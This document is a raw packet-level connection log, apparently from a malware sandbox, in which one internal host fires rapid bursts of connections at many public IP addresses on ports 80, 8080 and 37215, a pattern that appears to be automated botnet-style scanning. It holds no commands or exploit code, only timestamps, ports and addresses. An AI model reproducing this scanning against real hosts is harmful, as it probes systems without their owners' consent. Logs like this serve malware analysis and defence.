                                                              Nov 13, 2023 22:18:01.204900980 CET80801394831.47.42.74192.168.2.23
                                                              Nov 13, 2023 22:18:01.214749098 CET805645688.218.105.5192.168.2.23
                                                              Nov 13, 2023 22:18:01.214865923 CET805648488.218.105.5192.168.2.23
                                                              Nov 13, 2023 22:18:01.214880943 CET805645688.218.105.5192.168.2.23
                                                              Nov 13, 2023 22:18:01.214891911 CET805645688.218.105.5192.168.2.23
                                                              Nov 13, 2023 22:18:01.214947939 CET5648480192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:18:01.214967012 CET5645680192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:18:01.214967012 CET5645680192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:18:01.215084076 CET5648480192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:18:01.215172052 CET3420680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:01.215190887 CET5198280192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:01.215192080 CET4282080192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:01.215228081 CET5088480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.215239048 CET5725880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:01.215961933 CET80801394862.133.91.171192.168.2.23
                                                              Nov 13, 2023 22:18:01.358822107 CET804500688.99.231.68192.168.2.23
                                                              Nov 13, 2023 22:18:01.359400034 CET804502088.99.231.68192.168.2.23
                                                              Nov 13, 2023 22:18:01.359536886 CET4502080192.168.2.2388.99.231.68
                                                              Nov 13, 2023 22:18:01.359603882 CET4502080192.168.2.2388.99.231.68
                                                              Nov 13, 2023 22:18:01.359823942 CET80803634695.110.226.189192.168.2.23
                                                              Nov 13, 2023 22:18:01.359987020 CET363468080192.168.2.2395.110.226.189
                                                              Nov 13, 2023 22:18:01.359987020 CET363468080192.168.2.2395.110.226.189
                                                              Nov 13, 2023 22:18:01.360024929 CET363468080192.168.2.2395.110.226.189
                                                              Nov 13, 2023 22:18:01.360063076 CET363688080192.168.2.2395.110.226.189
                                                              Nov 13, 2023 22:18:01.364476919 CET804500688.99.231.68192.168.2.23
                                                              Nov 13, 2023 22:18:01.364556074 CET4500680192.168.2.2388.99.231.68
                                                              Nov 13, 2023 22:18:01.364593029 CET804500688.99.231.68192.168.2.23
                                                              Nov 13, 2023 22:18:01.364643097 CET4500680192.168.2.2388.99.231.68
                                                              Nov 13, 2023 22:18:01.365086079 CET80804241031.136.200.160192.168.2.23
                                                              Nov 13, 2023 22:18:01.365153074 CET424108080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:01.365178108 CET424108080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:01.365194082 CET424108080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:01.365212917 CET424328080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:01.372420073 CET80804495094.120.12.219192.168.2.23
                                                              Nov 13, 2023 22:18:01.374743938 CET80805170685.125.241.169192.168.2.23
                                                              Nov 13, 2023 22:18:01.374828100 CET517068080192.168.2.2385.125.241.169
                                                              Nov 13, 2023 22:18:01.374902010 CET517068080192.168.2.2385.125.241.169
                                                              Nov 13, 2023 22:18:01.374927998 CET517068080192.168.2.2385.125.241.169
                                                              Nov 13, 2023 22:18:01.374974012 CET517288080192.168.2.2385.125.241.169
                                                              Nov 13, 2023 22:18:01.380901098 CET80804228862.29.114.4192.168.2.23
                                                              Nov 13, 2023 22:18:01.380976915 CET80804743894.120.253.94192.168.2.23
                                                              Nov 13, 2023 22:18:01.381084919 CET474388080192.168.2.2394.120.253.94
                                                              Nov 13, 2023 22:18:01.381119013 CET474388080192.168.2.2394.120.253.94
                                                              Nov 13, 2023 22:18:01.381119013 CET474388080192.168.2.2394.120.253.94
                                                              Nov 13, 2023 22:18:01.381141901 CET474608080192.168.2.2394.120.253.94
                                                              Nov 13, 2023 22:18:01.387069941 CET80804261694.120.235.36192.168.2.23
                                                              Nov 13, 2023 22:18:01.392086029 CET80806073062.121.130.167192.168.2.23
                                                              Nov 13, 2023 22:18:01.392180920 CET607308080192.168.2.2362.121.130.167
                                                              Nov 13, 2023 22:18:01.392230988 CET607308080192.168.2.2362.121.130.167
                                                              Nov 13, 2023 22:18:01.392230988 CET607308080192.168.2.2362.121.130.167
                                                              Nov 13, 2023 22:18:01.392272949 CET607528080192.168.2.2362.121.130.167
                                                              Nov 13, 2023 22:18:01.397344112 CET449428080192.168.2.2394.120.12.219
                                                              Nov 13, 2023 22:18:01.397349119 CET426128080192.168.2.2394.120.235.36
                                                              Nov 13, 2023 22:18:01.397352934 CET333068080192.168.2.2331.136.252.65
                                                              Nov 13, 2023 22:18:01.425086975 CET80805908495.174.114.89192.168.2.23
                                                              Nov 13, 2023 22:18:01.425179005 CET590848080192.168.2.2395.174.114.89
                                                              Nov 13, 2023 22:18:01.443603992 CET805648488.218.105.5192.168.2.23
                                                              Nov 13, 2023 22:18:01.443671942 CET5648480192.168.2.2388.218.105.5
                                                              Nov 13, 2023 22:18:01.528455019 CET8034206112.125.190.166192.168.2.23
                                                              Nov 13, 2023 22:18:01.528630972 CET3420680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:01.528827906 CET3422680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:01.528858900 CET3420680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:01.528860092 CET3420680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:01.529805899 CET8051982112.125.221.109192.168.2.23
                                                              Nov 13, 2023 22:18:01.529875994 CET5198280192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:01.529907942 CET5198280192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:01.529907942 CET5198280192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:01.530119896 CET5200280192.168.2.23112.125.221.109
                                                              Nov 13, 2023 22:18:01.531295061 CET8042820112.125.160.163192.168.2.23
                                                              Nov 13, 2023 22:18:01.531374931 CET4282080192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:01.531399012 CET4282080192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:01.531407118 CET4282080192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:01.531429052 CET4284080192.168.2.23112.125.160.163
                                                              Nov 13, 2023 22:18:01.570684910 CET8050884112.90.90.216192.168.2.23
                                                              Nov 13, 2023 22:18:01.570787907 CET5088480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.570842981 CET5088480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.570842981 CET5088480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.570892096 CET5090480192.168.2.23112.90.90.216
                                                              Nov 13, 2023 22:18:01.663444042 CET8057258112.4.150.142192.168.2.23
                                                              Nov 13, 2023 22:18:01.663598061 CET5725880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:01.663682938 CET5725880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:01.663696051 CET5725880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:01.663743973 CET5727880192.168.2.23112.4.150.142
                                                              Nov 13, 2023 22:18:01.665227890 CET804502088.99.231.68192.168.2.23
                                                              Nov 13, 2023 22:18:01.665299892 CET4502080192.168.2.2388.99.231.68
                                                              Nov 13, 2023 22:18:01.677402973 CET1266037215192.168.2.2341.165.78.75
                                                              Nov 13, 2023 22:18:01.677402973 CET1266037215192.168.2.2341.31.152.235
                                                              Nov 13, 2023 22:18:01.677423954 CET1266037215192.168.2.2341.232.57.145
                                                              Nov 13, 2023 22:18:01.677439928 CET1266037215192.168.2.2341.225.205.109
                                                              Nov 13, 2023 22:18:01.677479029 CET1266037215192.168.2.2341.34.219.194
                                                              Nov 13, 2023 22:18:01.677505970 CET1266037215192.168.2.2341.59.236.214
                                                              Nov 13, 2023 22:18:01.677508116 CET1266037215192.168.2.2341.51.63.148
                                                              Nov 13, 2023 22:18:01.677546024 CET1266037215192.168.2.2341.192.170.154
                                                              Nov 13, 2023 22:18:01.677552938 CET1266037215192.168.2.2341.101.53.49
                                                              Nov 13, 2023 22:18:01.677567005 CET1266037215192.168.2.2341.192.137.104
                                                              Nov 13, 2023 22:18:01.677596092 CET1266037215192.168.2.2341.5.239.190
                                                              Nov 13, 2023 22:18:01.677623987 CET1266037215192.168.2.2341.141.29.122
                                                              Nov 13, 2023 22:18:01.677644014 CET1266037215192.168.2.2341.101.30.60
                                                              Nov 13, 2023 22:18:01.677663088 CET1266037215192.168.2.2341.48.241.44
                                                              Nov 13, 2023 22:18:01.677674055 CET1266037215192.168.2.2341.45.74.148
                                                              Nov 13, 2023 22:18:01.677721977 CET1266037215192.168.2.2341.79.84.243
                                                              Nov 13, 2023 22:18:01.677746058 CET1266037215192.168.2.2341.52.235.242
                                                              Nov 13, 2023 22:18:01.677764893 CET1266037215192.168.2.2341.102.113.189
                                                              Nov 13, 2023 22:18:01.677803040 CET1266037215192.168.2.2341.18.110.128
                                                              Nov 13, 2023 22:18:01.677823067 CET1266037215192.168.2.2341.165.95.25
                                                              Nov 13, 2023 22:18:01.677836895 CET1266037215192.168.2.2341.8.210.89
                                                              Nov 13, 2023 22:18:01.677856922 CET1266037215192.168.2.2341.215.74.139
                                                              Nov 13, 2023 22:18:01.677875996 CET1266037215192.168.2.2341.39.125.12
                                                              Nov 13, 2023 22:18:01.677901983 CET1266037215192.168.2.2341.47.71.123
                                                              Nov 13, 2023 22:18:01.677918911 CET1266037215192.168.2.2341.37.213.120
                                                              Nov 13, 2023 22:18:01.677938938 CET1266037215192.168.2.2341.147.31.106
                                                              Nov 13, 2023 22:18:01.677957058 CET1266037215192.168.2.2341.226.103.16
                                                              Nov 13, 2023 22:18:01.677973032 CET1266037215192.168.2.2341.20.89.146
                                                              Nov 13, 2023 22:18:01.677992105 CET1266037215192.168.2.2341.136.66.38
                                                              Nov 13, 2023 22:18:01.678028107 CET1266037215192.168.2.2341.128.248.223
                                                              Nov 13, 2023 22:18:01.678050995 CET1266037215192.168.2.2341.249.173.52
                                                              Nov 13, 2023 22:18:01.678060055 CET1266037215192.168.2.2341.199.71.57
                                                              Nov 13, 2023 22:18:01.678077936 CET1266037215192.168.2.2341.70.238.209
                                                              Nov 13, 2023 22:18:01.678100109 CET1266037215192.168.2.2341.99.189.158
                                                              Nov 13, 2023 22:18:01.678112030 CET1266037215192.168.2.2341.160.102.32
                                                              Nov 13, 2023 22:18:01.678131104 CET1266037215192.168.2.2341.228.131.196
                                                              Nov 13, 2023 22:18:01.678148985 CET1266037215192.168.2.2341.83.48.171
                                                              Nov 13, 2023 22:18:01.678179979 CET1266037215192.168.2.2341.173.81.105
                                                              Nov 13, 2023 22:18:01.678205967 CET1266037215192.168.2.2341.197.162.247
                                                              Nov 13, 2023 22:18:01.678225994 CET1266037215192.168.2.2341.86.78.206
                                                              Nov 13, 2023 22:18:01.678246975 CET1266037215192.168.2.2341.147.109.232
                                                              Nov 13, 2023 22:18:01.678267002 CET1266037215192.168.2.2341.140.119.210
                                                              Nov 13, 2023 22:18:01.678287983 CET1266037215192.168.2.2341.223.80.71
                                                              Nov 13, 2023 22:18:01.678306103 CET1266037215192.168.2.2341.148.151.246
                                                              Nov 13, 2023 22:18:01.678350925 CET1266037215192.168.2.2341.39.125.55
                                                              Nov 13, 2023 22:18:01.678370953 CET1266037215192.168.2.2341.116.180.206
                                                              Nov 13, 2023 22:18:01.678390026 CET1266037215192.168.2.2341.237.200.43
                                                              Nov 13, 2023 22:18:01.678407907 CET1266037215192.168.2.2341.216.154.53
                                                              Nov 13, 2023 22:18:01.678442955 CET1266037215192.168.2.2341.183.164.158
                                                              Nov 13, 2023 22:18:01.678443909 CET1266037215192.168.2.2341.173.160.35
                                                              Nov 13, 2023 22:18:01.678462029 CET1266037215192.168.2.2341.9.198.131
                                                              Nov 13, 2023 22:18:01.678479910 CET1266037215192.168.2.2341.133.123.181
                                                              Nov 13, 2023 22:18:01.678498983 CET1266037215192.168.2.2341.255.8.209
                                                              Nov 13, 2023 22:18:01.678524971 CET1266037215192.168.2.2341.134.97.188
                                                              Nov 13, 2023 22:18:01.678564072 CET1266037215192.168.2.2341.200.91.20
                                                              Nov 13, 2023 22:18:01.678586960 CET1266037215192.168.2.2341.51.8.31
                                                              Nov 13, 2023 22:18:01.678601027 CET1266037215192.168.2.2341.210.210.19
                                                              Nov 13, 2023 22:18:01.678632021 CET1266037215192.168.2.2341.186.94.247
                                                              Nov 13, 2023 22:18:01.678663015 CET1266037215192.168.2.2341.149.21.114
                                                              Nov 13, 2023 22:18:01.678685904 CET1266037215192.168.2.2341.150.1.226
                                                              Nov 13, 2023 22:18:01.678704977 CET1266037215192.168.2.2341.167.59.140
                                                              Nov 13, 2023 22:18:01.678715944 CET1266037215192.168.2.2341.26.97.168
                                                              Nov 13, 2023 22:18:01.678734064 CET1266037215192.168.2.2341.160.147.96
                                                              Nov 13, 2023 22:18:01.678765059 CET1266037215192.168.2.2341.61.161.126
                                                              Nov 13, 2023 22:18:01.678771973 CET1266037215192.168.2.2341.62.99.162
                                                              Nov 13, 2023 22:18:01.678792000 CET1266037215192.168.2.2341.116.153.137
                                                              Nov 13, 2023 22:18:01.678824902 CET1266037215192.168.2.2341.195.249.40
                                                              Nov 13, 2023 22:18:01.678838968 CET1266037215192.168.2.2341.185.156.140
                                                              Nov 13, 2023 22:18:01.678853035 CET1266037215192.168.2.2341.225.176.100
                                                              Nov 13, 2023 22:18:01.678873062 CET1266037215192.168.2.2341.38.182.239
                                                              Nov 13, 2023 22:18:01.678903103 CET1266037215192.168.2.2341.95.106.177
                                                              Nov 13, 2023 22:18:01.678920031 CET1266037215192.168.2.2341.142.159.165
                                                              Nov 13, 2023 22:18:01.678929090 CET1266037215192.168.2.2341.35.186.59
                                                              Nov 13, 2023 22:18:01.678960085 CET1266037215192.168.2.2341.96.97.241
                                                              Nov 13, 2023 22:18:01.679016113 CET1266037215192.168.2.2341.65.111.38
                                                              Nov 13, 2023 22:18:01.679034948 CET1266037215192.168.2.2341.89.83.213
                                                              Nov 13, 2023 22:18:01.679058075 CET1266037215192.168.2.2341.34.29.101
                                                              Nov 13, 2023 22:18:01.679075003 CET1266037215192.168.2.2341.244.99.56
                                                              Nov 13, 2023 22:18:01.679086924 CET1266037215192.168.2.2341.247.115.234
                                                              Nov 13, 2023 22:18:01.679086924 CET1266037215192.168.2.2341.230.18.47
                                                              Nov 13, 2023 22:18:01.679105997 CET1266037215192.168.2.2341.128.40.107
                                                              Nov 13, 2023 22:18:01.679142952 CET1266037215192.168.2.2341.142.170.231
                                                              Nov 13, 2023 22:18:01.679162025 CET1266037215192.168.2.2341.170.234.188
                                                              Nov 13, 2023 22:18:01.679183960 CET1266037215192.168.2.2341.61.51.191
                                                              Nov 13, 2023 22:18:01.679198027 CET1266037215192.168.2.2341.198.115.71
                                                              Nov 13, 2023 22:18:01.679203987 CET1266037215192.168.2.2341.208.17.239
                                                              Nov 13, 2023 22:18:01.679224968 CET1266037215192.168.2.2341.81.11.142
                                                              Nov 13, 2023 22:18:01.679245949 CET1266037215192.168.2.2341.67.194.245
                                                              Nov 13, 2023 22:18:01.679270029 CET1266037215192.168.2.2341.232.239.27
                                                              Nov 13, 2023 22:18:01.679335117 CET1266037215192.168.2.2341.141.243.107
                                                              Nov 13, 2023 22:18:01.679409027 CET1266037215192.168.2.2341.253.130.242
                                                              Nov 13, 2023 22:18:01.679411888 CET1266037215192.168.2.2341.63.57.34
                                                              Nov 13, 2023 22:18:01.679416895 CET1266037215192.168.2.2341.161.122.50
                                                              Nov 13, 2023 22:18:01.679416895 CET1266037215192.168.2.2341.116.218.125
                                                              Nov 13, 2023 22:18:01.679426908 CET1266037215192.168.2.2341.247.4.168
                                                              Nov 13, 2023 22:18:01.679446936 CET1266037215192.168.2.2341.139.213.68
                                                              Nov 13, 2023 22:18:01.679481030 CET1266037215192.168.2.2341.81.40.224
                                                              Nov 13, 2023 22:18:01.679497004 CET1266037215192.168.2.2341.175.7.147
                                                              Nov 13, 2023 22:18:01.679512024 CET1266037215192.168.2.2341.164.99.161
                                                              Nov 13, 2023 22:18:01.679527044 CET1266037215192.168.2.2341.80.4.74
                                                              Nov 13, 2023 22:18:01.679548025 CET1266037215192.168.2.2341.245.186.201
                                                              Nov 13, 2023 22:18:01.679567099 CET1266037215192.168.2.2341.55.170.246
                                                              Nov 13, 2023 22:18:01.679585934 CET1266037215192.168.2.2341.53.158.130
                                                              Nov 13, 2023 22:18:01.679599047 CET1266037215192.168.2.2341.226.64.153
                                                              Nov 13, 2023 22:18:01.679647923 CET1266037215192.168.2.2341.133.150.229
                                                              Nov 13, 2023 22:18:01.679662943 CET1266037215192.168.2.2341.114.250.198
                                                              Nov 13, 2023 22:18:01.679677963 CET1266037215192.168.2.2341.245.107.184
                                                              Nov 13, 2023 22:18:01.679711103 CET1266037215192.168.2.2341.239.22.167
                                                              Nov 13, 2023 22:18:01.679737091 CET1266037215192.168.2.2341.58.138.241
                                                              Nov 13, 2023 22:18:01.679749012 CET1266037215192.168.2.2341.219.70.165
                                                              Nov 13, 2023 22:18:01.679765940 CET1266037215192.168.2.2341.51.115.221
                                                              Nov 13, 2023 22:18:01.679814100 CET1266037215192.168.2.2341.227.34.21
                                                              Nov 13, 2023 22:18:01.679833889 CET1266037215192.168.2.2341.68.139.19
                                                              Nov 13, 2023 22:18:01.679840088 CET1266037215192.168.2.2341.161.215.153
                                                              Nov 13, 2023 22:18:01.679862976 CET1266037215192.168.2.2341.190.231.168
                                                              Nov 13, 2023 22:18:01.679894924 CET1266037215192.168.2.2341.135.177.190
                                                              Nov 13, 2023 22:18:01.679909945 CET1266037215192.168.2.2341.4.229.95
                                                              Nov 13, 2023 22:18:01.679912090 CET1266037215192.168.2.2341.19.227.193
                                                              Nov 13, 2023 22:18:01.679934978 CET1266037215192.168.2.2341.141.1.200
                                                              Nov 13, 2023 22:18:01.679950953 CET1266037215192.168.2.2341.112.239.44
                                                              Nov 13, 2023 22:18:01.679971933 CET1266037215192.168.2.2341.225.240.246
                                                              Nov 13, 2023 22:18:01.679992914 CET1266037215192.168.2.2341.179.48.0
                                                              Nov 13, 2023 22:18:01.680010080 CET1266037215192.168.2.2341.218.32.176
                                                              Nov 13, 2023 22:18:01.680041075 CET1266037215192.168.2.2341.195.35.53
                                                              Nov 13, 2023 22:18:01.680043936 CET1266037215192.168.2.2341.196.29.60
                                                              Nov 13, 2023 22:18:01.680062056 CET1266037215192.168.2.2341.16.240.192
                                                              Nov 13, 2023 22:18:01.680095911 CET1266037215192.168.2.2341.14.188.235
                                                              Nov 13, 2023 22:18:01.680110931 CET1266037215192.168.2.2341.18.190.110
                                                              Nov 13, 2023 22:18:01.680154085 CET1266037215192.168.2.2341.136.63.114
                                                              Nov 13, 2023 22:18:01.680155039 CET1266037215192.168.2.2341.250.38.186
                                                              Nov 13, 2023 22:18:01.680187941 CET1266037215192.168.2.2341.209.191.216
                                                              Nov 13, 2023 22:18:01.680207014 CET1266037215192.168.2.2341.97.5.11
                                                              Nov 13, 2023 22:18:01.680257082 CET1266037215192.168.2.2341.61.59.13
                                                              Nov 13, 2023 22:18:01.680274963 CET1266037215192.168.2.2341.32.81.147
                                                              Nov 13, 2023 22:18:01.680294037 CET1266037215192.168.2.2341.59.185.194
                                                              Nov 13, 2023 22:18:01.680320978 CET1266037215192.168.2.2341.4.255.179
                                                              Nov 13, 2023 22:18:01.680356026 CET1266037215192.168.2.2341.205.180.81
                                                              Nov 13, 2023 22:18:01.680371046 CET1266037215192.168.2.2341.93.94.62
                                                              Nov 13, 2023 22:18:01.680408955 CET1266037215192.168.2.2341.233.230.118
                                                              Nov 13, 2023 22:18:01.680413008 CET1266037215192.168.2.2341.222.50.172
                                                              Nov 13, 2023 22:18:01.680434942 CET1266037215192.168.2.2341.90.185.31
                                                              Nov 13, 2023 22:18:01.680459976 CET1266037215192.168.2.2341.127.34.34
                                                              Nov 13, 2023 22:18:01.680490017 CET1266037215192.168.2.2341.183.23.22
                                                              Nov 13, 2023 22:18:01.680511951 CET1266037215192.168.2.2341.139.171.248
                                                              Nov 13, 2023 22:18:01.680526972 CET1266037215192.168.2.2341.0.186.226
                                                              Nov 13, 2023 22:18:01.680555105 CET1266037215192.168.2.2341.169.17.53
                                                              Nov 13, 2023 22:18:01.680572033 CET1266037215192.168.2.2341.126.53.77
                                                              Nov 13, 2023 22:18:01.680589914 CET1266037215192.168.2.2341.38.175.178
                                                              Nov 13, 2023 22:18:01.680613995 CET1266037215192.168.2.2341.227.53.183
                                                              Nov 13, 2023 22:18:01.680648088 CET1266037215192.168.2.2341.216.79.240
                                                              Nov 13, 2023 22:18:01.680665970 CET1266037215192.168.2.2341.202.248.220
                                                              Nov 13, 2023 22:18:01.680686951 CET1266037215192.168.2.2341.119.98.21
                                                              Nov 13, 2023 22:18:01.680721998 CET1266037215192.168.2.2341.143.105.146
                                                              Nov 13, 2023 22:18:01.680758953 CET1266037215192.168.2.2341.25.27.202
                                                              Nov 13, 2023 22:18:01.680799007 CET1266037215192.168.2.2341.74.252.223
                                                              Nov 13, 2023 22:18:01.680811882 CET1266037215192.168.2.2341.172.160.167
                                                              Nov 13, 2023 22:18:01.680811882 CET1266037215192.168.2.2341.96.49.90
                                                              Nov 13, 2023 22:18:01.680816889 CET1266037215192.168.2.2341.211.178.71
                                                              Nov 13, 2023 22:18:01.680840015 CET1266037215192.168.2.2341.152.178.107
                                                              Nov 13, 2023 22:18:01.680869102 CET1266037215192.168.2.2341.80.92.158
                                                              Nov 13, 2023 22:18:01.682915926 CET80803634695.110.226.189192.168.2.23
                                                              Nov 13, 2023 22:18:01.683646917 CET80803634695.110.226.189192.168.2.23
                                                              Nov 13, 2023 22:18:01.683790922 CET363468080192.168.2.2395.110.226.189
                                                              Nov 13, 2023 22:18:01.692858934 CET80804243231.136.200.160192.168.2.23
                                                              Nov 13, 2023 22:18:01.692989111 CET424328080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:01.693031073 CET424328080192.168.2.2331.136.200.160
                                                              Nov 13, 2023 22:18:01.693073034 CET139488080192.168.2.2331.191.12.151
                                                              Nov 13, 2023 22:18:01.693088055 CET139488080192.168.2.2362.171.68.8
                                                              Nov 13, 2023 22:18:01.693104982 CET139488080192.168.2.2362.219.57.255
                                                              Nov 13, 2023 22:18:01.693110943 CET139488080192.168.2.2394.171.152.31
                                                              Nov 13, 2023 22:18:01.693110943 CET139488080192.168.2.2395.60.253.135
                                                              Nov 13, 2023 22:18:01.693130970 CET139488080192.168.2.2394.188.163.144
                                                              Nov 13, 2023 22:18:01.693130970 CET139488080192.168.2.2394.174.176.131
                                                              Nov 13, 2023 22:18:01.693136930 CET139488080192.168.2.2331.5.131.90
                                                              Nov 13, 2023 22:18:01.693139076 CET139488080192.168.2.2395.110.103.174
                                                              Nov 13, 2023 22:18:01.693139076 CET139488080192.168.2.2395.236.163.7
                                                              Nov 13, 2023 22:18:01.693161011 CET139488080192.168.2.2362.141.99.68
                                                              Nov 13, 2023 22:18:01.693161964 CET139488080192.168.2.2394.232.152.103
                                                              Nov 13, 2023 22:18:01.693171024 CET139488080192.168.2.2385.123.46.102
                                                              Nov 13, 2023 22:18:01.693176031 CET139488080192.168.2.2331.32.39.32
                                                              Nov 13, 2023 22:18:01.693183899 CET139488080192.168.2.2385.54.189.187
                                                              Nov 13, 2023 22:18:01.693187952 CET139488080192.168.2.2394.97.10.6
                                                              Nov 13, 2023 22:18:01.693183899 CET139488080192.168.2.2395.139.79.24
                                                              Nov 13, 2023 22:18:01.693192005 CET139488080192.168.2.2394.66.254.0
                                                              Nov 13, 2023 22:18:01.693214893 CET139488080192.168.2.2331.88.169.209
                                                              Nov 13, 2023 22:18:01.693221092 CET139488080192.168.2.2394.48.179.218
                                                              Nov 13, 2023 22:18:01.693223953 CET139488080192.168.2.2331.36.92.190
                                                              Nov 13, 2023 22:18:01.693226099 CET139488080192.168.2.2395.209.19.45
                                                              Nov 13, 2023 22:18:01.693238020 CET139488080192.168.2.2331.160.106.96
                                                              Nov 13, 2023 22:18:01.693248987 CET139488080192.168.2.2385.184.215.74
                                                              Nov 13, 2023 22:18:01.693248987 CET139488080192.168.2.2394.150.61.11
                                                              Nov 13, 2023 22:18:01.693248987 CET139488080192.168.2.2395.208.32.56
                                                              Nov 13, 2023 22:18:01.693268061 CET139488080192.168.2.2331.161.225.224
                                                              Nov 13, 2023 22:18:01.693279982 CET139488080192.168.2.2395.90.241.251
                                                              Nov 13, 2023 22:18:01.693304062 CET139488080192.168.2.2385.249.20.92
                                                              Nov 13, 2023 22:18:01.693319082 CET139488080192.168.2.2362.146.46.206
                                                              Nov 13, 2023 22:18:01.693326950 CET139488080192.168.2.2385.236.169.3
                                                              Nov 13, 2023 22:18:01.693326950 CET139488080192.168.2.2362.248.220.88
                                                              Nov 13, 2023 22:18:01.693336964 CET139488080192.168.2.2331.52.201.1
                                                              Nov 13, 2023 22:18:01.693346024 CET139488080192.168.2.2394.75.225.60
                                                              Nov 13, 2023 22:18:01.693342924 CET139488080192.168.2.2385.159.74.173
                                                              Nov 13, 2023 22:18:01.693351030 CET139488080192.168.2.2385.143.35.123
                                                              Nov 13, 2023 22:18:01.693371058 CET139488080192.168.2.2362.50.97.243
                                                              Nov 13, 2023 22:18:01.693372965 CET139488080192.168.2.2362.34.152.165
                                                              Nov 13, 2023 22:18:01.693378925 CET139488080192.168.2.2331.154.9.192
                                                              Nov 13, 2023 22:18:01.693392992 CET139488080192.168.2.2395.244.198.200
                                                              Nov 13, 2023 22:18:01.693397045 CET139488080192.168.2.2395.28.205.101
                                                              Nov 13, 2023 22:18:01.693397045 CET139488080192.168.2.2362.26.82.117
                                                              Nov 13, 2023 22:18:01.693414927 CET139488080192.168.2.2362.91.115.98
                                                              Nov 13, 2023 22:18:01.693418026 CET139488080192.168.2.2394.115.255.44
                                                              Nov 13, 2023 22:18:01.693432093 CET139488080192.168.2.2331.36.223.11
                                                              Nov 13, 2023 22:18:01.693434000 CET139488080192.168.2.2395.111.168.109
                                                              Nov 13, 2023 22:18:01.693439960 CET139488080192.168.2.2331.233.0.109
                                                              Nov 13, 2023 22:18:01.693449974 CET139488080192.168.2.2385.245.120.218
                                                              Nov 13, 2023 22:18:01.693453074 CET139488080192.168.2.2385.175.168.255
                                                              Nov 13, 2023 22:18:01.693461895 CET139488080192.168.2.2394.75.9.91
                                                              Nov 13, 2023 22:18:01.693464041 CET139488080192.168.2.2394.209.205.66
                                                              Nov 13, 2023 22:18:01.693475962 CET139488080192.168.2.2331.129.17.93
                                                              Nov 13, 2023 22:18:01.693483114 CET139488080192.168.2.2385.121.149.60
                                                              Nov 13, 2023 22:18:01.693489075 CET139488080192.168.2.2385.172.119.254
                                                              Nov 13, 2023 22:18:01.693489075 CET139488080192.168.2.2362.135.200.146
                                                              Nov 13, 2023 22:18:01.693515062 CET139488080192.168.2.2385.142.84.222
                                                              Nov 13, 2023 22:18:01.693515062 CET139488080192.168.2.2385.138.230.17
                                                              Nov 13, 2023 22:18:01.693520069 CET139488080192.168.2.2385.138.126.30
                                                              Nov 13, 2023 22:18:01.693520069 CET139488080192.168.2.2385.33.209.224
                                                              Nov 13, 2023 22:18:01.693526030 CET139488080192.168.2.2394.192.69.3
                                                              Nov 13, 2023 22:18:01.693536997 CET139488080192.168.2.2394.42.26.171
                                                              Nov 13, 2023 22:18:01.693540096 CET139488080192.168.2.2362.229.183.35
                                                              Nov 13, 2023 22:18:01.693555117 CET139488080192.168.2.2331.71.69.229
                                                              Nov 13, 2023 22:18:01.693558931 CET139488080192.168.2.2395.12.79.52
                                                              Nov 13, 2023 22:18:01.693564892 CET139488080192.168.2.2331.173.238.32
                                                              Nov 13, 2023 22:18:01.693583012 CET139488080192.168.2.2362.27.165.226
                                                              Nov 13, 2023 22:18:01.693583965 CET139488080192.168.2.2395.221.180.179
                                                              Nov 13, 2023 22:18:01.693584919 CET139488080192.168.2.2362.247.142.30
                                                              Nov 13, 2023 22:18:01.693586111 CET139488080192.168.2.2395.13.116.161
                                                              Nov 13, 2023 22:18:01.693595886 CET139488080192.168.2.2394.136.235.18
                                                              Nov 13, 2023 22:18:01.693600893 CET139488080192.168.2.2394.7.193.123
                                                              Nov 13, 2023 22:18:01.693613052 CET139488080192.168.2.2395.75.108.78
                                                              Nov 13, 2023 22:18:01.693619013 CET139488080192.168.2.2385.115.3.134
                                                              Nov 13, 2023 22:18:01.693624020 CET139488080192.168.2.2362.24.32.174
                                                              Nov 13, 2023 22:18:01.693634987 CET139488080192.168.2.2394.179.246.214
                                                              Nov 13, 2023 22:18:01.693639040 CET139488080192.168.2.2362.196.147.210
                                                              Nov 13, 2023 22:18:01.693650007 CET139488080192.168.2.2362.127.138.17
                                                              Nov 13, 2023 22:18:01.693656921 CET139488080192.168.2.2385.177.196.97
                                                              Nov 13, 2023 22:18:01.693671942 CET139488080192.168.2.2394.172.239.229
                                                              Nov 13, 2023 22:18:01.693671942 CET139488080192.168.2.2394.52.2.27
                                                              Nov 13, 2023 22:18:01.693679094 CET139488080192.168.2.2362.23.231.57
                                                              Nov 13, 2023 22:18:01.693689108 CET139488080192.168.2.2362.246.158.22
                                                              Nov 13, 2023 22:18:01.693692923 CET139488080192.168.2.2385.160.46.217
                                                              Nov 13, 2023 22:18:01.693697929 CET139488080192.168.2.2331.147.37.177
                                                              Nov 13, 2023 22:18:01.693710089 CET139488080192.168.2.2394.236.208.107
                                                              Nov 13, 2023 22:18:01.693710089 CET139488080192.168.2.2394.11.87.193
